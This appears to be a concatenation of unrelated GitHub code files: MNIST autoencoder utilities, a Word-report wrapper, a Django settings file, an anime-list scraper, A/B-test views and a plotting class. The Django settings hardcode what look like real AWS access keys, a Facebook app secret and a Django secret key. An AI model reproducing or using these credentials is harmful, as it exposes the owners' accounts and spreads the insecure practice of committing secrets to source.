dimensions.')\n\n\tpickle_pathname = os.path.join(autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\tencoded_data = mnist_data_set.images.dot(W)\n\n\tif 'autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.autoencoder[dimension] = encoded_data\n\telse:\n\t\tmnist_data_set.autoencoder = {dimension: encoded_data}\n\n\ndef add_fft_autoencoded_mnist_data_set(mnist_data_set, dimension):\n\t\"\"\" Add data to mnist data set (train, validation, or test)\n\t\tthat has been Fast Fourier Transformed and then passed\n\t\tto an autoencoder of the specified dimension \"\"\"\n\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(fft_autoencoder_dir):\n\t\traise ValueError('No autoencoder for FFT data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(fft_autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\tif 'fft_images' in dir(mnist_data_set):\n\t\tfft_data = mnist_data_set.fft_images\n\telse:\n\t\tfft_data = compressed_fft_data(mnist_data_set.images)\n\n\tencoded_data = fft_data.dot(W)\n\n\tif 'fft_autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.fft_autoencoder[dimension] = encoded_data\n\telse:\n\t\tmnist_data_set.fft_autoencoder = {dimension: encoded_data}\n\n\ndef add_hybrid_autoencoded_mnist_data_set(mnist_data_set, dim_tuple):\n\t\"\"\" Add data to a mnist data set (train, validation, or test)\n\tconsisting of the original data autoencoded to dim_tuple[0] dimensions\n\tand the FFT data autoencoded to dim_tuple[1] dimensions. The result\n\tis a numpy array with dim_tuple[0] + dim_tuple[1] features. 
\"\"\"\n\t\t\n\tif dim_tuple == (0,0):\n\t\treturn\n\n\tif dim_tuple[0] == 0:\n\t\tif ('fft_autoencoder' not in dir(mnist_data_set) or \n\t\t\tdim_tuple[1] not in mnist_data_set.fft_autoencoder):\n\t\t\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[1])\n\t\thybrid_data = mnist_data_set.fft_autoencoder[dim_tuple[1]]\n\telif dim_tuple[1] == 0:\n\t\tif ('autoencoder' not in dir(mnist_data_set) or \n\t\t\tdim_tuple[0] not in mnist_data_set.autoencoder):\n\t\t\tadd_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[0])\n\t\thybrid_data = mnist_data_set.autoencoder[dim_tuple[0]]\n\telse:\n\t\tif not ('autoencoder' in dir(mnist_data_set) and \n\t\t\tdim_tuple[0] in mnist_data_set.autoencoder):\n\t\t\tadd_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[0])\n\t\tif not ('fft_autoencoder' in dir(mnist_data_set) and \n\t\t\tdim_tuple[1] in mnist_data_set.fft_autoencoder):\n\t\t\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dim_tuple[1])\n\t\thybrid_data = np.concatenate((mnist_data_set.autoencoder[dim_tuple[0]],\n\t\t\t\t\t\t\t\t mnist_data_set.fft_autoencoder[dim_tuple[1]]),\n\t\t\t\t\t\t\t\t axis = 1)\n\n\tif 'hybrid_autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.hybrid_autoencoder[dim_tuple] = hybrid_data\n\telse:\n\t\tmnist_data_set.hybrid_autoencoder = {dim_tuple: hybrid_data}\n\n\ndef decode(encoded_data, dimension):\n\t\"\"\" Map from the autoencoded image space (with specified dimension) to the \n\toriginal image feature space \"\"\"\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\treturn encoded_data.dot(W.transpose())\n\n\ndef fft_decode(encoded_data, dimension):\n\t\"\"\" Map from the 
autoencoded FFT space (with specified dimension) to the \n\t\"compressed\" FFT feature space \"\"\"\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(fft_autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(fft_autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\treturn encoded_data.dot(W.transpose())\n\n\ndef image_from_compressed_fft(autoencoded_fft_data, data_set = 'mnist'):\n\t\"\"\" Obtain image pixels from \"compressed\" Fourier transformed MNIST data \"\"\"\n\tdimension = autoencoded_fft_data.shape[1]\n\tcompressed_fft_data = fft_decode(autoencoded_fft_data, dimension)\n\treturn np.real(np.fft.ifft2(decompress_fft(compressed_fft_data))).reshape(-1, 784)\n\n\ndef hybrid_decode(encoded_data, dim_tuple):\n\t\"\"\"Obtain image pixels from a hybrid (autoencoded and FFT autoencoded)\n\tfeature space\"\"\"\n\tif dim_tuple[0] == 0:\n\t\treturn image_from_compressed_fft(encoded_data)\n\tif dim_tuple[1] == 0:\n\t\treturn decode(encoded_data, dim_tuple[0])\n\n\tautoencoded_data = encoded_data[:,:dim_tuple[0]]\n\tfft_autoencoded_data = encoded_data[:, dim_tuple[0]:]\n\n\tautoencoded_image = decode(autoencoded_data, dim_tuple[0])\n\tfft_autoencoded_image = image_from_compressed_fft(\n\t\tfft_autoencoded_data, dim_tuple[1])\n\n\treturn (dim_tuple[0] * autoencoded_image + \n\t\tdim_tuple[1] * fft_autoencoded_image)/(\n\t\tdim_tuple[0] + dim_tuple[1])\n\n\ndef scale_encoder(mnist_data_set, encoding_type, dim_key):\n\t\"\"\" Scale an array of type encoding_type labelled by dim_key \"\"\"\n\tarray = getattr(mnist_data_set, encoding_type)[dim_key]\n\tif not (encoding_type + '_data' in dir(mnist_data_set) and\n\t\tdim_key in getattr(mnist_data_set, encoding_type + '_data')):\n\t\tscale_dict = {key: getattr(np, key)(array, axis = 0)\n\t\t\t\t\t 
for key in ['mean', 'max', 'min']}\n\t\tscaled_data = ((array - scale_dict['mean'])/\n\t\t\t (scale_dict['max'] - scale_dict['min']))\n\tif encoding_type + '_data' in dir(mnist_data_set):\n\t\tgetattr(mnist_data_set, encoding_type + '_data')[dim_key] = scale_dict\n\t\tgetattr(mnist_data_set, 'scaled_' + encoding_type)[dim_key] = scaled_data\n\telse:\n\t\tsetattr(mnist_data_set, encoding_type + '_data', {dim_key: scale_dict})\n\t\tsetattr(mnist_data_set, 'scaled_' + encoding_type, {dim_key: scaled_data})\n\n\ndef scale_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to scale an MNIST autoencoding with no FFT data.\"\"\"\n\tscale_encoder(mnist_data_set, 'autoencoder', dimension)\n\n\ndef scale_fft_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to scale an autoencoding of FFT-ed MNIST data.\"\"\"\n\tscale_encoder(mnist_data_set, 'fft_autoencoder', dimension)\n\n\ndef scale_hybrid_autoencoder(mnist_data_set, dim_tuple):\n\t\"\"\" Convenience function to scale a direct prodcut of autoencodings of\n\tunFFT-ed and FFT-ed MNIST data.\"\"\"\n\tscale_encoder(mnist_data_set, 'hybrid_autoencoder', dim_tuple)\n\n\ndef add_and_scale_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain an MNIST autoencoding with no FFT data\n\t\tand then to scale it.\"\"\"\n\tadd_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_autoencoder(mnist_data_set, dimension)\n\n\ndef add_and_scale_fft_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain an autoencoding of FFT-ed MNIST data\n\t\tand then to scale it.\"\"\"\n\tadd_fft_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_fft_autoencoder(mnist_data_set, dimension)\n\n\ndef add_and_scale_hybrid_autoencoder(mnist_data_set, dimension):\n\t\"\"\" Convenience function to obtain a direct prodcut of autoencodings of\n\tunFFT-ed and FFT-ed MNIST data and then to scale 
it.\"\"\"\n\tadd_hybrid_autoencoded_mnist_data_set(mnist_data_set, dimension)\n\tscale_hybrid_autoencoder(mnist_data_set, dimension)\n\n\ndef get_mnist_data_and_add_autoencodings(autoencoder_dict):\n\t\"\"\"Function to obtain mnist data, and add appropriate\n\tautoencodings as specified in autoencoder_dict.\"\"\"\n\tmnist = get_mnist_data()\n\tfor key in ['autoencoder', 'fft_autoencoder', \n\t\t\t\t'hybrid_autoencoder']:\n\t\tif key not in autoencoder_dict:\n\t\t\tautoencoder_dict[key] = {}\n\tfor subset in [\"train\", \"validation\", \"test\"]:\n\t\tdata_set = getattr(mnist, subset)\n\t\tfor dimension in autoencoder_dict['autoencoder']:\n\t\t\tadd_and_scale_autoencoder(data_set, dimension)\n\t\tfor dimension in autoencoder_dict['fft_autoencoder']:\n\t\t\tadd_and_scale_fft_autoencoder(data_set, dimension)\n\t\tfor dim_tuple in autoencoder_dict['hybrid_autoencoder']:\n\t\t\tadd_and_scale_hybrid_autoencoder(data_set, dim_tuple)\n\treturn mnist\n\n","repo_name":"JamieGainer/Linear_Autoencoder_and_FFT_for_MNIST","sub_path":"autoencoder_fft_mnist/fft_autoencoder.py","file_name":"fft_autoencoder.py","file_ext":"py","file_size_in_byte":11576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35023286554","text":"\"\"\" Wrapper onto python-docx library \"\"\"\nimport os\nfrom pyccata.core.interface import ReportingInterface\nfrom pyccata.core.decorators import accepts\nfrom pyccata.core.log import Logger\nfrom pyccata.core.parts.list import List\nfrom pyccata.core.configuration import Configuration\n\nfrom docx import Document\nfrom docx.shared import Inches\n\nclass Docx(object):\n \"\"\" Class for creating reports in Microsoft Word format \"\"\"\n __implements__ = (ReportingInterface,)\n _client = None\n _configuration = None\n _run = None\n _template_file = None\n\n MAXWIDTH = 5.7\n\n REQUIRED = [\n 'path',\n 'datapath',\n 'title',\n 'subtitle',\n 'abstract',\n 'sections'\n ]\n\n def __init__(self):\n \"\"\" 
Load the driver and create title page \"\"\"\n Logger().info('Initialising Microsoft Word format driver')\n self._configuration = Configuration()\n\n @property\n def client(self):\n \"\"\" Get the client interface \"\"\"\n if self._client is None:\n for location in self._configuration.locations:\n try:\n template = self._configuration.report.template if hasattr(\n self._configuration.report, 'template'\n ) else None\n\n Logger().debug('Checking for template file in \\'{0}\\''.format(location))\n template_file = os.path.join(str(location), str(template))\n with open(template_file):\n self._template_file = template_file\n Logger().info('Using template file ' + str(template_file))\n break\n except (IOError, TypeError):\n pass\n\n self._client = Document(docx=self._template_file)\n return self._client\n\n @accepts(str, style=(None, str))\n def add_paragraph(self, text, style=None):\n \"\"\"\n Add a paragraph of text to the report\n\n @param text string\n \"\"\"\n self._run = self.client.add_paragraph(str(text), style=style)\n\n @accepts(str, style=(None, str))\n def add_run(self, text, style=None):\n \"\"\"\n Adds a run of text to the current active paragraph\n\n @param text string\n @param style str\n \"\"\"\n if style is not None:\n setattr(self._run.add_run(text), style, True)\n else:\n self._run.add_run(text)\n\n @accepts(str, style=(None, str))\n def add_list(self, text, style=None):\n \"\"\"\n Add a paragraph of text to the report\n\n @param text string\n @param style string [ListBullet,ListNumber]\n \"\"\"\n paragraph = self.client.add_paragraph(str(text), style=style)\n paragraph.paragraph_format.left_indent = Inches(List.INDENT)\n\n @accepts(str, int)\n def add_heading(self, heading, level):\n \"\"\"\n Add a heading to the report\n\n @param heading string\n @param level int\n \"\"\"\n self.client.add_heading(str(heading), int(level))\n\n @accepts(headings=(None, list), data=(None, list), style=str)\n def add_table(self, headings=None, data=None, style=''):\n 
\"\"\"\n Add a table to the report\n\n @param headings list\n @param data list A nested lists of strings.\n @param style string\n \"\"\"\n table = self.client.add_table(rows=1, cols=len(headings), style=style)\n header_cells = table.rows[0].cells\n for i, heading in enumerate(headings):\n header_cells[i].text = str(heading)\n\n for row in data:\n cells = table.add_row().cells\n if not isinstance(row, list):\n row = list(row)\n if len(row) > len(headings):\n row = row[1:]\n for i, col in enumerate(row):\n cells[i].text = str(col)\n\n\n @accepts(str, width=(int, float))\n def add_picture(self, filename, width=0):\n \"\"\"\n Add a picture to the report\n\n @param filename string\n @param width int\n \"\"\"\n if width == 0:\n width = self.MAXWIDTH\n self.client.add_picture(filename, width=Inches(width))\n\n def add_page_break(self):\n \"\"\" Adds a page break to the report \"\"\"\n self.client.add_page_break()\n\n def format_for_email(self):\n \"\"\"\n Adds the document contents to a single table cell for display in email\n \"\"\"\n document = Document(docx=self._template_file)\n table = document.add_table(rows=1, cols=1)\n table.autofit = False\n\n cell = table.cell(0, 0)\n\n #pylint: disable=protected-access\n # We are extending the internals of the docx package to enable\n # this functionality. 
Therefore protected access is required\n cell._element[:] = self.client._body._body[:]\n cell.add_paragraph()\n\n self._client = document\n\n @accepts(str)\n def save(self, filename):\n \"\"\"\n Save the file to disk\n\n @param filename string\n \"\"\"\n self.client.save(filename)\n","repo_name":"mproffitt/pyccata","sub_path":"src/pyccata/core/managers/clients/docx.py","file_name":"docx.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35768804009","text":"# coding:utf-8\nimport os\nimport iptools\n\nimport socket\n\nPRODUCTION = STAGING = DEVELOPMENT = False\n\nINTERNAL_IPS = iptools.IpRangeList(\n '127.0.0.1', # single ip\n '192.168/16', # CIDR network block\n ('10.0.0.1', '10.0.0.19'), # arbitrary range\n)\n\n# Absolute path to project directory.\n# If you rename/remove this you will break things\nPROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n\nADMINS = (\n ('Jenso', 'jenso1988@gmail.com'),\n ('Samuel', 'smulster@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nSTATIC_URL = '/static/'\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Stockholm'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'sv'\n\nSITE_ID = 1\nSITE_DOMAIN = 'stylematch.se'\nSITE_NAME = 'Stylematch'\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_DOC_ROOT = os.path.join(PROJECT_DIR, \"static/\")\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\n\nSTATIC_ROOT = os.path.join(PROJECT_DIR, \"static/\")\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = STATIC_URL + 'admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, 'staticfiles'),\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 
'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '11ju*buxq(sqnmg%!^za&&v_+0=j#p2)iuhu+o6sw+lcdyfytl'\nif not SECRET_KEY:\n from logging import warn\n warn('Please set a unique SECRET_KEY in ' + __file__)\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\n# Replace information tag because jquery.noty accepts type: 'information'\n# instead.\nfrom django.contrib.messages import constants as message_constants\nNOTIFICATION = 23\nMESSAGE_TAGS = {\n NOTIFICATION: 'notification',\n message_constants.INFO: 'info',\n message_constants.SUCCESS: 'success',\n message_constants.WARNING: 'warning',\n message_constants.ERROR: 'error',\n }\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n PROJECT_DIR + \"/templates/\",\n # Put strings here, like\n # \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'registration',\n 'django.contrib.sitemaps',\n 'social_auth',\n 'django_extensions',\n 'south',\n 'bootstrap',\n 'braces',\n 'index',\n 'accounts',\n 'dashboard',\n 'storages',\n 'defaultsite',\n 'django_su',\n 
'fts',\n 'sorl.thumbnail',\n 'gunicorn',\n)\n\nAWS_ACCESS_KEY_ID = 'AKIAJHCGEY6XAXXOSYXA'\nAWS_SECRET_ACCESS_KEY = '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'\n\nEMAIL_BACKEND = 'django_ses.SESBackend'\nDEFAULT_FROM_EMAIL = SERVER_EMAIL = 'hampus.bergqvist@stylematch.se'\n\"\"\"\nSERVER_EMAIL, default error message email.\nDEFAULT_FROM_EMAIL, all other mails\n\"\"\"\n\n### END Amazon credentials\n\n\n### social auth\n\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nFACEBOOK_APP_ID = '309825002426259'\nFACEBOOK_API_SECRET = 'd22e35493d901a90fafb05ae6e26fe7c'\n\n# when we upgrade to django 1.4,\n#these should be evaluated with reverse_lazy() and url_name\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\n#LOGIN_ERROR_URL = '/login-error/'\nSOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/konto/registrering-steg1/'\n\nSOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'\nSOCIAL_AUTH_EXTRA_DATA = False\nSOCIAL_AUTH_EXPIRATION = 'expires'\nSOCIAL_AUTH_SESSION_EXPIRATION = False\nSOCIAL_AUTH_ERROR_KEY = 'socialauth_error'\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\nFACEBOOK_AUTH_EXTRA_ARGUMENTS = {'display': 'popup'}\nSOCIAL_AUTH_ASSOCIATE_BY_MAIL = True\n# END social_auth\n\n# inform where user profile model is defined\nAUTH_PROFILE_MODULE = \"accounts.UserProfile\"\n\nLOG_DIR = os.path.join(PROJECT_DIR, 'log')\nBASE_LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['console', 'file_warning'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'file_debug': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': '%s/debug.log' % LOG_DIR,\n 'formatter': 'verbose',\n },\n 'file_warning': {\n 'level': 'WARNING',\n 'class': 'logging.FileHandler',\n 'filename': '%s/warning.log' % LOG_DIR,\n 'formatter': 
'verbose',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console', 'file_debug'],\n 'propagate': True,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['file_debug'],\n 'propagate': True,\n },\n },\n}\n\nSENTRY_LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'ERROR',\n 'class': 'raven.contrib.django.handlers.SentryHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n# django-registration - dont remove or stuff will break\nACCOUNT_ACTIVATION_DAYS = 7\n\n# Galleria - should use some cdn in production\nGALLERIA_URL = STATIC_URL + \"js/galleria/src/\"\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.messages.context_processors.messages',\n 'django.contrib.auth.context_processors.auth',\n 'index.context_processors.galleria_urls',\n 'index.context_processors.django_settings',\n # used to access STATIC_URL in templates\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n )\n\n# Paths to user uploaded images, used in fileupload app\nPATH_USER_IMGS 
= \"user-imgs/\"\n\nMAX_IMAGE_SIZE = 20 * 1024 * 1024\nFULL_PATH_USER_IMGS = os.path.join(MEDIA_URL, PATH_USER_IMGS)\n\n# Google analytics key\nGOOGLE_ANALYTICS_KEY = \"\"\n\n# Google API Key\nGOOGLE_API_KEY = \"\"\n\n# Kissmetrics Key\nKISSMETRICS_KEY = \"\"\n\n# InterCom Key\nINTERCOM_KEY = \"\"\n","repo_name":"flashjames/Stylematch","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7557485504","text":"import threading\nfrom urllib import request\nfrom requests import get\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sqlite3\nfrom config import *\nimport time\nclass Extractor(threading.Thread):\n headers = {\n \"User-Agent\": \"MAL scraping for University project (Anime recommendation model). Contact juanda20202@hotmail.com if scraping is overburdening the server\"\n }\n\n def __init__(self, inf, top, i):\n self.__inf = inf\n self.__top = top\n self.__i = i\n threading.Thread.__init__(self)\n\n def queryUsers(self):\n with sqlite3.connect(DB) as conn:\n return list(pd.read_sql('SELECT DISTINCT username from reviews;',conn)['username'])\n\n def getAnimelist(self, username, userid):\n api = f\"https://myanimelist.net/animelist/{username}/load.json?status=7&offset=0\"\n\n try: \n response = get(api, headers=self.headers, timeout = 30)\n except Exception as e:\n print('Request timeout ', e)\n return\n if response.status_code == 403:\n return 'Error'\n df = pd.DataFrame.from_dict(response.json()) \n \n df['user_id'] = [userid]*len(df)\n #status 1 = watching \n #status 2 = completed \n #status 3 = on Hold\n #status 4 = dropped\n dfcleaned = df[df['status'] == 2][['user_id','anime_id','score','anime_title']].reset_index()\n return dfcleaned \n\n\n\n\n def run(self):\n users = self.queryUsers()\n fails = 0\n succesfull = 0\n user_fails = []\n exTime = time.time()\n\n interval = 
[self.__inf,self.__top] #interval of extraction\n auxrun = True\n paused = ''\n numberPaused = 1\n print(interval)\n for userid,user in enumerate(users[interval[0]:interval[1]]):\n if auxrun:\n animelistData = self.getAnimelist(user,userid+self.__inf)\n succesfull += 1\n auxrun = False\n else:\n try:\n aux = self.getAnimelist(user,userid+self.__inf)\n if type(aux) == str:\n print(f'-------Paused {numberPaused}-------------')\n paused = f\"Interval: {interval[0]} --- {interval[1]}.\\nPausedAt: {userid+self.__inf}\"\n print(paused) \n print('Time: ', time.time()-exTime)\n print('Succesful: ',succesfull)\n print('Fails: ',fails)\n print('-----------------------------','\\n')\n fails += 1\n numberPaused += 1\n time.sleep(360)\n print(f'Thread {self.__i} continuing')\n\n if aux is not None:\n animelistData = animelistData.append(aux, ignore_index = True)\n succesfull += 1\n else:\n fails += 1\n user_fails.append([userid,user])\n except Exception as e:\n fails += 1\n user_fails.append([userid,user])\n\n animelistData.drop('index', axis=1, inplace=True)\n exTime = time.time()-exTime\n print(animelistData)\n print('Fails: ', fails)\n print('Time: ', exTime)\n print('Succesful: ',succesfull)\n #print(paused)\n animelistData.to_csv(f\"animelistData{self.__i}.csv\")\n\n\nthreads = 4\ninterval = int(50524/threads)-1\n\nfor i in range(threads):\n Extractor( i*interval, i*interval + interval, i+1).start()\n\n\n\n\n\n\n\n#Join merging tables\n#'type','source','scored_by','score','favorites','members','popularity','studio'\n","repo_name":"dsceafit/animeai","sub_path":"model/scrapers/mallistextractor.py","file_name":"mallistextractor.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29761127316","text":"from django.shortcuts import render_to_response, HttpResponse, RequestContext, HttpResponseRedirect\nfrom django.contrib.messages import success\nfrom abTest import goalReached, 
render_to_ab_response\n\nfrom abTest.models import Test, TestResult, Goal, Experiment\n\ndef contact(request):\n context = RequestContext(request)\n return render_to_response(\"contact.html\", context_instance = context)\n\n\ndef home(request):\n context = RequestContext(request)\n return render_to_response(\"home.html\", context_instance = context)\n\ndef createLiveDemoData(request):\n if request.method == \"POST\":\n test = Test.objects.create(name = \"background\", active = True)\n test.goals.add(Goal.objects.create(name = \"buttonPressed\"))\n test.experiments.add(Experiment.objects.create(name=\"red\"))\n test.experiments.add(Experiment.objects.create(name=\"blue\"))\n test.experiments.add(Experiment.objects.create(name=\"green\"))\n test.save()\n success(request, \"Created live demo test data.\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n context = RequestContext(request)\n return render_to_response(\"createLiveDemoData.html\", context_instance = context)\n\ndef liveDemo(request):\n if not Test.objects.filter(name = \"background\").exists():\n return createLiveDemoData(request)\n context = RequestContext(request)\n testResults = {}\n for test in Test.objects.filter(active = True):\n testResult = {}\n results = TestResult.objects.filter(test = test)\n testResult['count'] = len(results)\n reachedTotal = 0\n experiments = {}\n for experiment in test.experiments.all():\n experimentResult = {}\n allRuns = results.filter(experiment = experiment)\n experimentResult['count'] = len(allRuns)\n reachedGoals = 0\n for run in allRuns:\n reachedGoals += len(run.goals.all())\n experimentResult['reachedGoals'] = reachedGoals\n experiments[experiment] = experimentResult\n reachedTotal += reachedGoals\n\n testResult['reachedGoals'] = reachedTotal\n testResult['experiments'] = experiments\n testResults[test] = testResult\n return render_to_response(\"liveDemo.html\", {'testResults' : testResults, 'site':'liveDemo'}, context_instance = context)\n\ndef 
reachedGoalButton(request):\n \"\"\"\n Earn a lot of money here, and set reached goal\n \"\"\"\n\n goalReached(request, \"buttonPressed\")\n success(request, \"thx for your money...\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef models(request):\n context = RequestContext(request)\n return render_to_response(\"models.html\", {'site':'models'}, context_instance = context)\n\ndef usage(request):\n context = RequestContext(request)\n return render_to_response(\"usage.html\", {'site':'usage'}, context_instance = context)\n\ndef home_old(request):\n if request.method == \"POST\":\n #get money here ....\n goalReached(request, \"example Goal\")\n\n return HttpResponse(\"thx for your money...\")\n context = RequestContext(request)\n return render_to_ab_response(request.abTest, {\n 'red' : 'abTest/red.html',\n 'blue' : 'abTest/blue.html',\n 'black' : 'abTest/black.html',\n }, defaultTemplate=\"abTest/example.html\", context_instance=context)\n #return render_to_response(\"abTest/example.html\", context_instance = context)\n\n","repo_name":"camillo/django-abTest","sub_path":"example/abWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12745723378","text":"from typing import List\n\nfrom pandas import DataFrame\n\nfrom cloudberry.api.model import SeriesInfo\n\n\nclass PlotSeries:\n def __init__(self,\n series_info: SeriesInfo,\n data: DataFrame,\n x_field: str,\n y_field: str,\n y_err_field: str = None):\n self.series_info = series_info\n self.data = data\n self.x_field = x_field\n self.y_field = y_field\n self.y_err_field = y_err_field\n\n\nclass PlotSeriesPack:\n def __init__(self,\n series: List[PlotSeries],\n averages: List[PlotSeries]):\n self.series = series\n self.averages = 
